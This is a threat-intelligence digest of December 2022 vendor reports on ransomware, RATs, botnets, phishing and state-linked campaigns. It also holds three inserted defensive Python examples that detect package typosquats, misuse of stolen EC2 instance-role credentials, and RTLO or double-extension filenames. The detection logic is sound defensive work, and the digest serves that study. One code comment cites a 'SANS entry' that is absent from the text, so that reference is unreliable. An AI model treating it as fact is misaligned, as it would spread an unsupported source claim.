- Cyble
- Intel Name:
- The_increased_Activity_of_Mallox_Ransomware
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) recently observed a spike in Mallox ransomware samples. The ransomware is also called TargetCompany because it appends the targeted company's name as an extension to the encrypted files. In September 2022, researchers identified a TargetCompany variant targeting Microsoft SQL servers that added the "Fargo" extension to encrypted files; the ransomware is also known to add a "Mallox" extension after encryption.
Source:
https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/
—
- Intel Source:
- Cyble
- Intel Name:
- Expansion_of_Venom_RAT_operations
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- CRIL has uncovered a new version of the Venom RAT (Remote Access Trojan), which can steal sensitive data from a victim's computer. Venom RAT works stealthily, giving attackers unauthorized access to the victim's machine. Threat actors can then use the victim's computer to perform various malicious activities such as installing and removing additional malware, manipulating files, reading keyboard input, harvesting login credentials, and monitoring the clipboard.
Source:
https://blog.cyble.com/2022/12/13/venom-rat-expands-its-operations-by-adding-a-stealer-module/
—
- Intel Source:
- Weixin
- Intel Name:
- The_new_Go_language_botnet_RedGoBot
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Last month the QiAnXin Threat Intelligence Center captured a malicious sample from an unknown family that exploited the Vacron NVR RCE vulnerability to spread. Detailed analysis showed that this series of samples does not belong to any known malicious family. Because the sample prints the string "GoBot" when it runs, and the author's website carries the text "@redbot on top", the researchers named it RedGoBot.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Cloud_Atlas_Targeting_Entities_in_Russia_and_Belarus
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Check Point researchers have observed Cloud Atlas continuously and persistently targeting entities of interest. With the escalation of the conflict between Russia and Ukraine, the group's focus for the past year has been on Russia and Belarus, particularly their diplomatic, government, energy, and technology sectors, and on the annexed regions of Ukraine.
—
- Intel Source:
- Cybereason
- Intel Name:
- Analysis_of_Royal_Ransomware
- Date of Scan:
- 2022-12-14
- Impact:
- MEDIUM
- Summary:
- Cybereason researchers report that the Royal ransomware group emerged in early 2022 and has gained momentum since the middle of the year. Its ransomware, which the group deploys through different TTPs, has impacted multiple organizations across the globe. The group itself is suspected of consisting of former members of other ransomware groups, based on similarities researchers have observed between Royal ransomware and other ransomware operations.
Source:
https://www.cybereason.com/blog/royal-ransomware-analysis
—
- Intel Source:
- Fortinet
- Intel Name:
- GoTrim_Botnet_Brute_Forces_WordPress_Site_Admin_Accounts
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have observed a new Go-based botnet malware named 'GoTrim' that scans the web for self-hosted WordPress websites and attempts to brute-force the administrator's password to take control of the site.
—
- Intel Source:
- Secureworks
- Intel Name:
- COBALT_MIRAGE_Hackers_Leveraging_Drokbk_Malware
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Researchers from Secureworks investigated the Drokbk malware, which is operated by a subgroup of the Iranian government-sponsored COBALT MIRAGE threat group known as Cluster B. Drokbk is written in .NET and consists of a dropper and a payload; it uses GitHub as a dead-drop resolver to locate its command-and-control server.
Source:
https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver
—
- Intel Source:
- Wordfence
- Intel Name:
- Vulnerabilities_Found_in_Adning_and_Kaswara_Plugin
- Date of Scan:
- 2022-12-14
- Impact:
- MEDIUM
- Summary:
- Researchers from Wordfence observed spikes in attacks targeting vulnerabilities in the Adning and Kaswara WordPress plugins, which serve as a reminder to keep plugins updated.
Source:
https://www.wordfence.com/blog/2022/12/spikes-in-attacks-serve-as-a-reminder-to-update-plugins/
—
- Intel Source:
- Mandiant, SentinelOne
- Intel Name:
- Targeted_Attacks_Leverage_Signed_Malicious_Microsoft_Drivers
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- SentinelOne discovered threat actors abusing malicious kernel drivers carrying legitimate Microsoft signatures in active intrusions into telecommunications, BPO, MSSP, and financial services businesses. Investigation of these intrusions led to the discovery of the POORTRY and STONESTOP malware, part of a small toolkit designed to terminate AV and EDR processes.
Source:
https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware
https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/
—
- Intel Source:
- Phylum
- Intel Name:
- Malware_Strains_Targeting_Python_and_JavaScript_Developers
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Phylum researchers have identified an active malware campaign targeting the Python Package Index (PyPI) and npm repositories with typosquatted and fake modules that deploy a ransomware strain, the latest security issue to affect software supply chains.
Source:
https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi
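Typosquatting campaigns like the Phylum and ReversingLabs findings above work because a package name one edit away from a popular one is easy to mistype or to mistake for the real thing. The following is an added example (not Phylum's or ReversingLabs' code) of the check a dependency gate can run before a name is installed: it normalizes names the way PyPI does (PEP 503: lowercase, runs of `-`, `_` and `.` collapsed to `-`), then flags candidates within a small Levenshtein distance of a known-popular name, names that wrap a popular name in a generic affix (`python-requests`), and names with a bare version suffix. The popular-package list and the requirements lines are constructed for the example; in practice the list would come from registry download statistics or an internal mirror.

```python
# Added example: flag package names that squat on popular ones before they
# are installed. Not the code of Phylum, ReversingLabs or any registry.
# POPULAR_PACKAGES and SAMPLE_REQUIREMENTS are constructed sample data.
import re
from typing import Dict, Iterable, List, Tuple

POPULAR_PACKAGES: List[str] = [
    "requests", "urllib3", "numpy", "pandas", "cryptography", "colorama",
    "lodash", "express", "react",
]

SAMPLE_REQUIREMENTS: List[str] = [
    "numpy>=1.23",
    "reqeusts==2.28.1",      # transposed letters
    "python-requests",       # generic affix around a real name
    "colourama",             # one inserted letter
    "some-internal-lib==0.4",
]


def normalize(name: str) -> str:
    """PEP 503 normalization: case-insensitive, -/_/. runs become a single '-'."""
    return re.sub(r"[-_.]+", "-", name.strip().lower())


def levenshtein(a: str, b: str) -> int:
    """Edit distance via the standard two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_package(name: str, known: Iterable[str] = POPULAR_PACKAGES,
                  max_distance: int = 2) -> List[Tuple[str, str, int]]:
    """Return (popular_name, reason, distance) for every popular name this one squats on.

    An exact match to a popular package returns an empty list: that is the real thing.
    """
    n = normalize(name)
    known_n = {normalize(k): k for k in known}
    if n in known_n:
        return []
    tokens = set(n.split("-"))
    stripped = re.sub(r"\d+$", "", n)
    hits = []
    for kn, k in known_n.items():
        d = levenshtein(n, kn)
        if d <= max_distance:
            hits.append((k, "edit-distance", d))
        elif kn in tokens:
            hits.append((k, "affix", d))
        elif stripped == kn:
            hits.append((k, "version-suffix", d))
    return sorted(hits, key=lambda h: (h[2], h[0]))


def scan_requirements(lines: Iterable[str]) -> Dict[str, List[Tuple[str, str, int]]]:
    """Apply check_package to each requirement line; only flagged names are returned."""
    flagged = {}
    for line in lines:
        line = line.split("#", 1)[0].strip()
        m = re.match(r"^[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if not m:
            continue
        hits = check_package(m.group(0))
        if hits:
            flagged[m.group(0)] = hits
    return flagged


if __name__ == "__main__":
    for pkg, hits in scan_requirements(SAMPLE_REQUIREMENTS).items():
        print(pkg, "->", hits)
```

A distance threshold of 2 is a deliberately loose starting point; tighten it for short names, where two edits can reach many legitimate packages, and pair the check with a review of what the package's install hooks (`setup.py`, npm `preinstall`) actually execute.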
—
- Intel Source:
- SentinelOne, Mandiant and Sophos
- Intel Name:
- MS_Signed_Malicious_Drivers_Used_in_Ransomware_Attacks
- Date of Scan:
- 2022-12-14
- Impact:
- MEDIUM
- Summary:
- Microsoft revoked several hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents. Multiple researchers explain that threat actors are utilizing malicious kernel-mode hardware drivers whose trust is verified with Authenticode signatures from Microsoft’s Windows Hardware Developer Program.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_Leveraging_LiveHelp100_For_Supply_Chain_Attacks
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro analyzed the infection chain and the malware used by malicious actors in supply-chain attacks that leveraged trojanized installers of chat-based customer engagement platforms.
—
- Intel Source:
- Fortiguard
- Intel Name:
- FortiOS_SSL_VPN_bug
- Date of Scan:
- 2022-12-13
- Impact:
- MEDIUM
- Summary:
- Fortinet urges customers to update their installations to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that an unauthenticated remote attacker could exploit to execute arbitrary code on affected devices.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Analysis_of_the_infamous_Azov_Ransomware
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Check Point shared a report with more details on the internal workings of Azov ransomware and its technical features.
—
- Intel Source:
- Trustwave
- Intel Name:
- Formbook_malware_deployed_using_OneNote_Documents
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Trustwave uncovered threat actors using a OneNote document to deliver Formbook malware, an information-stealing trojan sold on an underground hacking forum as malware-as-a-service since mid-2016.
—
- Intel Source:
- Cymru
- Intel Name:
- Continuation_of_Iranian_Exploitation_Activities
- Date of Scan:
- 2022-12-13
- Impact:
- MEDIUM
- Summary:
- Team Cymru shared an update on its ongoing tracking of the PHOSPHORUS threat actor group associated with Iran. PHOSPHORUS is known to target organizations in the energy, government, and technology sectors based in Europe, the Middle East, the United States, and other countries and regions.
Source:
https://www.team-cymru.com/post/iranian-exploitation-activities-continue-as-of-november-2022
—
- Intel Source:
- ASEC
- Intel Name:
- Microsoft_Account_Stealing_Phishing_Page
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that a large portion of phishing emails aim to steal login credentials for Microsoft accounts.
—
- Intel Source:
- Ptsecurity
- Intel Name:
- The_Cloud_Atlas_group_activity
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Positive Technologies (PT Security) discussed the main techniques of the Cloud Atlas group, took an in-depth look at the tools they use, and published a detailed analysis and description of the functionality of those tools.
—
- Intel Source:
- Juniper Network
- Intel Name:
- New_Python_Backdoor_Targeting_VMware_ESXi_Servers
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Juniper Networks researchers have identified a previously undocumented Python backdoor targeting VMware ESXi servers that enables attackers to execute commands remotely on a compromised system.
Source:
https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers
—
- Intel Source:
- Jscrambler
- Intel Name:
- A_new_batch_of_Web_Skimming_attacks
- Date of Scan:
- 2022-12-12
- Impact:
- LOW
- Summary:
- Jscrambler analysts observed a new modus operandi shared by three web-skimming threat groups and shared a detailed analysis of their findings.
Source:
https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Linux_Cryptocurrency_Mining_Attacks_Increasing_via_CHAOS_RAT
- Date of Scan:
- 2022-12-12
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro observed a cryptocurrency mining attack against Linux hosts that incorporated an advanced remote access trojan (RAT) named the CHAOS Remote Administrative Tool.
Source:
https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html
—
- Intel Source:
- Sucuri
- Intel Name:
- World_Cup_Keywords_targeted_by_Chinese_Gambling_Spam
- Date of Scan:
- 2022-12-12
- Impact:
- LOW
- Summary:
- Sucuri researchers found that many of the compromised websites in a Chinese gambling spam campaign have recently been updated to include modified titles with keywords related to the Qatar 2022 FIFA World Cup; the campaign has pivoted to leverage search traffic for the popular soccer championship.
Source:
https://blog.sucuri.net/2022/12/chinese-gambling-spam-targets-world-cup-keywords.html
—
- Intel Source:
- Deep Instinct
- Intel Name:
- MuddyWater_APT_group_is_back_with_updated_TTPs
- Date of Scan:
- 2022-12-12
- Impact:
- LOW
- Summary:
- Researchers from Deep Instinct have identified a new campaign conducted by the MuddyWater APT (aka SeedWorm, TEMP.Zagros, and Static Kitten) that was targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and United Arab Emirates.
Source:
https://www.deepinstinct.com/blog/new-muddywater-threat-old-kitten-new-tricks
—
- Intel Source:
- Cyble
- Intel Name:
- The_various_scams_exploiting_the_popularity_of_the_FIFA_World_Cup
- Date of Scan:
- 2022-12-10
- Impact:
- LOW
- Summary:
- While monitoring phishing activity, Cyble Research & Intelligence Labs identified a few crypto phishing schemes involving the use of the FIFA World Cup theme to lure the victims. The phishing site “football-blnance[.]com” was pretending to be the Binance cryptocurrency website attempting to trick users into giving sensitive information by offering free Non-Fungible Tokens (NFTs).
Source:
https://blog.cyble.com/2022/12/09/threat-actors-targeting-fans-amid-fifa-world-cup-fever/
—
- Intel Source:
- Esentire
- Intel Name:
- The_Redline_Stealer_distribution_via_fake_software_AnyDesk
- Date of Scan:
- 2022-12-10
- Impact:
- MEDIUM
- Summary:
- eSentire SOC cyber analysts performed a deeper malware analysis of how the RedLine Stealer operates and concluded that it is mostly distributed via fake software. The attackers also use YouTube and other third-party advertising platforms to spread the stealer, and use an AutoIt wrapper and various crypting services to obfuscate the stealer binary. RedLine includes loader tasks that allow an attacker to perform various actions on the infected host, including file download, process injection, and command execution.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-redline-stealer
—
- Intel Source:
- CERT-UA
- Intel Name:
- kamikaze_drones_and_DolphinCape_malware
- Date of Scan:
- 2022-12-09
- Impact:
- MEDIUM
- Summary:
- The Government Computer Emergency Response Team of Ukraine (CERT-UA) received information from the cyber security division of JSC "Ukrzaliznytsia" about e-mails with the subject "How to recognize a kamikaze drone" sent from the address "[email protected][.]ua", apparently on behalf of the State Emergency Service of Ukraine.
—
- Intel Source:
- Intel Name:
- Internet_Explorer_0day_exploited_by_North_Korean_actor_APT37
- Date of Scan:
- 2022-12-09
- Impact:
- LOW
- Summary:
- Google's Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in the wild. This post describes a 0-day vulnerability, discovered by TAG in late October 2022, embedded in malicious documents and used to target users in South Korea.
—
- Intel Source:
- Esentire
- Intel Name:
- New_Infection_Technique_of_GootLoader_malware
- Date of Scan:
- 2022-12-09
- Impact:
- MEDIUM
- Summary:
- On December 2, 2022, an eSentire SOC cyber analyst raised an incident involving the GootLoader malware at a pharmaceutical company, and eSentire's Threat Response Unit proceeded with an in-depth investigation of GootLoader's new infection technique.
Source:
https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_identified_TAG53_infrastructure_features_common_traits
- Date of Scan:
- 2022-12-09
- Impact:
- LOW
- Summary:
- Recorded Future’s Insikt Group has identified new infrastructure used by TAG-53, a group likely linked to suspected Russian threat activity groups Callisto Group, COLDRIVER, and SEABORGIUM.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Breaking_the_silence_Truebot_activity
- Date of Scan:
- 2022-12-09
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers report that one of the new follow-on payloads Truebot drops is the Grace malware (aka FlawedGrace and GraceWire), which is attributed to TA505, further supporting the link between Truebot and that group.
Source:
https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Cloud_compute_credentials_attack_examples
- Date of Scan:
- 2022-12-09
- Impact:
- LOW
- Summary:
- Palo Alto Networks Unit 42 shared two examples of attacks on cloud compute credentials observed in the wild. They described the post-breach actions executed during each attack and the flow of both attacks against the cloud infrastructure. The attack flows show how threat actors abuse stolen compute credentials to pursue a variety of attack vectors and abuse cloud services in unexpected ways, which emphasizes how important it is to follow Amazon Web Services and Google Cloud logging and monitoring best practices.
Source:
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
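The logging best practice the entry above points to only pays off if someone queries the logs for the tell-tale pattern: credentials that belong to a compute instance's role being used from an address that is not the instance. The following is an added example (not Unit 42's code) that runs that check over CloudTrail-shaped events. It relies on the fact that EC2 instance-profile sessions carry the instance ID as the assumed-role session name, treats any source IP outside the operator's trusted CIDRs as suspect, skips AWS-service-originated calls whose `sourceIPAddress` is a service DNS name, and then groups the findings to surface reconnaissance bursts. The events, account ID, role name and CIDRs are constructed sample data.

```python
# Added example: detect EC2 instance-role credentials used from outside the
# instance's network, plus the reconnaissance burst that typically follows.
# Not Unit 42's or AWS's code. SAMPLE_EVENTS is constructed to mimic the
# CloudTrail record layout; account ID and addresses are documentation values.
import ipaddress
import re
from collections import defaultdict
from typing import Dict, Iterable, List

EC2_SESSION_RE = re.compile(r"^i-[0-9a-f]{8,17}$")

# API calls that are harmless in themselves but, in a burst from a new source,
# are what an intruder runs first with a freshly stolen credential.
RECON_CALLS = {
    "GetCallerIdentity", "ListBuckets", "ListUsers", "ListRoles",
    "DescribeInstances", "GetAccountSummary", "ListSecrets",
}


def _instance_event(name: str, source: str, src_ip: str, when: str) -> dict:
    """Build a constructed CloudTrail record for the WebAppRole instance profile."""
    return {
        "eventTime": when, "eventSource": source, "eventName": name,
        "sourceIPAddress": src_ip, "awsRegion": "us-east-1",
        "userIdentity": {
            "type": "AssumedRole",
            "arn": "arn:aws:sts::123456789012:assumed-role/WebAppRole/i-0abc123def456789a",
            "accessKeyId": "ASIAEXAMPLEKEY00001",
            "sessionContext": {
                "sessionIssuer": {"type": "Role", "userName": "WebAppRole",
                                  "arn": "arn:aws:iam::123456789012:role/WebAppRole"},
                "ec2RoleDelivery": "2.0",
            },
        },
    }


SAMPLE_EVENTS: List[dict] = [
    _instance_event("DescribeInstances", "ec2.amazonaws.com", "10.0.1.23", "2022-12-01T10:02:11Z"),
    _instance_event("GetCallerIdentity", "sts.amazonaws.com", "203.0.113.7", "2022-12-01T10:40:02Z"),
    _instance_event("ListBuckets", "s3.amazonaws.com", "203.0.113.7", "2022-12-01T10:40:09Z"),
    _instance_event("ListUsers", "iam.amazonaws.com", "203.0.113.7", "2022-12-01T10:40:15Z"),
    # Service-originated call: sourceIPAddress is a DNS name, not an IP, and is skipped.
    _instance_event("RunInstances", "ec2.amazonaws.com", "ec2.amazonaws.com", "2022-12-01T10:45:00Z"),
    {   # An IAM user from the same external IP: not an instance credential, so out of scope here.
        "eventTime": "2022-12-01T10:50:00Z", "eventSource": "s3.amazonaws.com",
        "eventName": "ListBuckets", "sourceIPAddress": "203.0.113.7",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice",
                         "accessKeyId": "AKIAEXAMPLEKEY00002"},
    },
]


def is_instance_role_session(event: dict) -> bool:
    """True when the caller is an assumed role whose session name is an EC2 instance ID."""
    identity = event.get("userIdentity", {})
    if identity.get("type") != "AssumedRole":
        return False
    session_name = identity.get("arn", "").rsplit("/", 1)[-1]
    return bool(EC2_SESSION_RE.match(session_name))


def flag_credential_misuse(events: Iterable[dict], trusted_cidrs: Iterable[str]) -> List[dict]:
    """Return instance-role calls whose source IP lies outside every trusted CIDR."""
    networks = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = []
    for ev in events:
        if not is_instance_role_session(ev):
            continue
        try:
            ip = ipaddress.ip_address(ev.get("sourceIPAddress", ""))
        except ValueError:
            continue  # service DNS names such as "ec2.amazonaws.com"
        if any(ip in net for net in networks):
            continue
        identity = ev["userIdentity"]
        findings.append({
            "eventTime": ev["eventTime"], "eventName": ev["eventName"],
            "sourceIPAddress": str(ip), "instanceId": identity["arn"].rsplit("/", 1)[-1],
            "role": identity["sessionContext"]["sessionIssuer"]["arn"],
        })
    return findings


def recon_sources(findings: Iterable[dict], threshold: int = 3) -> List[str]:
    """Source IPs that issued at least `threshold` distinct reconnaissance calls."""
    seen: Dict[str, set] = defaultdict(set)
    for f in findings:
        if f["eventName"] in RECON_CALLS:
            seen[f["sourceIPAddress"]].add(f["eventName"])
    return sorted(ip for ip, calls in seen.items() if len(calls) >= threshold)


if __name__ == "__main__":
    hits = flag_credential_misuse(SAMPLE_EVENTS, ["10.0.0.0/16"])
    for h in hits:
        print(h["eventTime"], h["sourceIPAddress"], h["instanceId"], h["eventName"])
    print("recon sources:", recon_sources(hits))
```

The trusted-CIDR list is the weak point of this check: NAT gateways and VPC endpoints change what CloudTrail records as the source, so populate it from the account's actual egress addresses rather than the VPC range alone, and treat a first sighting of an instance ID from any new address as worth a look even below the recon threshold.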
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Email_Impersonating_Quasi_governmental_Organization_Being_Distributed
- Date of Scan:
- 2022-12-08
- Impact:
- LOW
- Summary:
- ASEC analysis team has recently detected the distribution of a phishing email impersonating a non-profit quasi-governmental organization. Since the email is using a webpage disguised as a login page of GobizKOREA serviced by Korea SMEs and Startups Agency (KOSME), users who are working in the trading industry should take extra caution.
—
- Intel Source:
- Threat Fabric
- Intel Name:
- New_obfuscation_service_used_by_Ermac_when_distributed_together_with_desktop_stealers
- Date of Scan:
- 2022-12-08
- Impact:
- LOW
- Summary:
- ThreatFabric's analysts discovered a campaign employing several Trojans and targeting both Android and Windows users at the same time, in order to reach as many victims as possible. Besides the Ermac Android banking Trojan, the campaign involved desktop malware in the form of the Erbium and Aurora stealers and the Laplas "clipper".
Source:
https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html
—
- Intel Source:
- Picus Security
- Intel Name:
- Cuba_Ransomware_TTPs
- Date of Scan:
- 2022-12-08
- Impact:
- MEDIUM
- Summary:
- Security researchers from Picus Security tracked a new variant of the Cuba ransomware, whose operators are also known as Tropical Scorpius. The Cuba ransomware group mainly targets the manufacturing, professional and legal services, financial services, construction, high technology, and healthcare sectors.
—
- Intel Source:
- Securelist
- Intel Name:
- DeathStalker_targets_legal_entities_with_new_Janicab_variant
- Date of Scan:
- 2022-12-08
- Impact:
- LOW
- Summary:
- While tracking DeathStalker intrusions that use the Janicab malware family, Securelist researchers identified a new Janicab variant used to target legal entities in the Middle East throughout 2020, possibly active during 2021, and potentially extending an extensive campaign that has been traced back to early 2015 and targeted legal, financial, and travel agencies in the Middle East and Europe.
Source:
https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/
—
- Intel Source:
- ASEC
- Intel Name:
- Resumexll_File_Being_Distributed_in_Korea
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- The ASEC analysis team shared that malware in the XLL file format (file extension: .xll) was being distributed via email. An XLL file is a PE (Portable Executable) file in DLL form, but it is loaded and executed by Microsoft Excel as an add-in.
—
- Intel Source:
- Bitdefender
- Intel Name:
- A_New_BackdoorDiplomacy_Threat_Actor_Campaign_Investigation
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- Bitdefender researchers uncovered a malicious campaign targeting the Middle East that abuses binaries vulnerable to DLL sideloading. They analyzed the evidence and traced it to a cyber-espionage operation most likely performed by the Chinese threat actor BackdoorDiplomacy against victims linked to the telecom industry in the Middle East.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Distributed_with_Disguised_Filenames
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- The ASEC analysis team posted about malware being distributed with filenames that use RTLO (Right-To-Left Override). RTLO is a Unicode control character (U+202E) that reverses the display direction of the text that follows it. This type of malware induces users to execute its files by placing the control character so that the displayed filename appears to end in a harmless extension while the real extension is executable.
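The RTLO trick here, the `.pdf.exe` double extension in the SANS entry above, and the XLL add-in that is really a PE file in the ASEC entry are all the same class of problem: the name a user sees does not describe what the file is. The following is an added example (not ASEC's or SANS's code) of a mail-gateway style check that inspects both sides: it strips bidirectional control characters and flags them, flags document-looking names that end in an executable extension, shows how a naive renderer would display an RTLO name, and compares the claimed extension against the file's magic bytes. The extension sets, magic table and sample files are constructed for the example.

```python
# Added example: filename and content checks for the deception techniques the
# surrounding entries describe (RTLO, double extension, wrong container type).
# Not ASEC's, SANS's or any product's code; the tables below are constructed
# starting points, not an exhaustive list.
from typing import List, Optional, Tuple

RTLO = "\u202e"
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs",
             "xll", "dll", "msi", "hta"}
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}

# (magic prefix, type) pairs; order matters only where prefixes overlap.
MAGIC: List[Tuple[bytes, str]] = [
    (b"MZ", "pe"), (b"%PDF", "pdf"), (b"Rar!\x1a\x07", "rar"),
    (b"PK\x03\x04", "zip"), (b"\x7fELF", "elf"),
]
# What content the extension claims; XLL is legitimately a PE DLL.
EXT_TO_TYPE = {"pdf": "pdf", "exe": "pe", "dll": "pe", "xll": "pe", "scr": "pe",
               "zip": "zip", "docx": "zip", "xlsx": "zip", "rar": "rar"}


def displayed_name(name: str) -> str:
    """Approximate how a bidi-aware renderer shows the name: text after RTLO is reversed."""
    if RTLO in name:
        head, tail = name.split(RTLO, 1)
        return head + tail[::-1]
    return name


def check_filename(name: str) -> List[str]:
    """Findings derived from the name alone, using the real (logical) character order."""
    findings = []
    if any(ch in BIDI_CONTROLS for ch in name):
        findings.append("bidi-control-char")
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    parts = clean.lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXEC_EXTS and parts[-2] in DOC_EXTS:
        findings.append("double-extension")
    if parts[-1] in EXEC_EXTS:
        findings.append("executable-extension")
    return findings


def sniff_type(data: bytes) -> Optional[str]:
    """Identify the container/executable type from leading magic bytes."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def check_file(name: str, data: bytes) -> List[str]:
    """Name checks plus a claimed-extension versus real-content comparison."""
    findings = check_filename(name)
    real = sniff_type(data)
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS).lower()
    ext = clean.rsplit(".", 1)[-1] if "." in clean else ""
    expected = EXT_TO_TYPE.get(ext)
    if real is not None:
        if expected is not None and expected != real:
            findings.append(f"extension-mismatch:{ext}->{real}")
        elif expected is None:
            findings.append(f"unexpected-content:{ext}->{real}")
    return findings


# Constructed sample attachments (name, first bytes) mirroring the entries above.
SAMPLES = [
    ("payment_copy.pdf.z", b"Rar!\x1a\x07\x00" + b"\x00" * 8),   # RAR posing as .z
    ("payment_copy.pdf.exe", b"MZ\x90\x00" + b"\x00" * 12),       # double extension
    ("photo" + RTLO + "gnp.scr", b"MZ\x90\x00" + b"\x00" * 12),   # displays as photorcs.png
    ("resume.xll", b"MZ\x90\x00" + b"\x00" * 12),                 # Excel add-in, a PE by design
    ("report.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3"),                # genuine PDF
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(repr(displayed_name(name)), check_file(name, data))
```

Run over real attachments, the `executable-extension` finding on `resume.xll` is the one to act on even though the content matches: an add-in is executable code regardless of how it is named, which is exactly why the XLL lure works.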
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Email_Disguised_as_a_WellKnown_Korean_Airline
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- The ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean airline to collect user credentials. The email contains a notice about an airline ticket payment, luring the reader to a disguised phishing page; it quotes specific ticket prices and details, implying that the sender has background information on the reader.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- CrowdStrike_Investigations_Reveal_Intrusion_Campaign_Targeting_Telco_and_BPO_Companies
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- CrowdStrike Services reviews a recent, extremely persistent intrusion campaign targeting telecommunications and business process outsourcing (BPO) companies and outlines how organizations can defend and secure their environments.
Source:
https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/
—
- Intel Source:
- Microsoft
- Intel Name:
- Targeted_attacks_by_DEV_0139_against_the_cryptocurrency_industry
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- Microsoft shared that cryptocurrency companies have been targeted by a threat group DEV-0139 via Telegram groups used to communicate with the firms’ VIP customers.
—
- Intel Source:
- Fortinet
- Intel Name:
- Zerobot_New_Go_Based_Botnet
- Date of Scan:
- 2022-12-07
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs recently observed a new botnet written in Go being distributed through IoT vulnerabilities and categorized it as critical. The botnet, known as Zerobot, contains several modules, including self-replication, attacks for different protocols, and self-propagation, and communicates with its command-and-control server over the WebSocket protocol. The researchers detail how the malware leverages vulnerabilities and examine its behavior once inside an infected device.
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- A_new_Agrius_threat_group_wiper_Fantasy
- Date of Scan:
- 2022-12-07
- Impact:
- MEDIUM
- Summary:
- Agrius is a new Iranian group that has been targeting victims in Israel and the United Arab Emirates since 2020. The group initially deployed a wiper. Recently, the group deployed a new wiper named Fantasy. Most of its code base comes from Apostle, Agrius’s previous wiper.
Source:
https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/
—
- Intel Source:
- Fortinet
- Intel Name:
- Ransomware_Turning_into_an_Accidental_Wiper
- Date of Scan:
- 2022-12-06
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGate have observed a Cryptonite sample in the wild that never offers the decryption window, instead acting as a wiper. We recently saw an increase in ransomware intentionally turned into wiper malware, primarily as part of a political campaign.
—
- Intel Source:
- Cybereason
- Intel Name:
- Masquerading_as_a_Software_Installer
- Date of Scan:
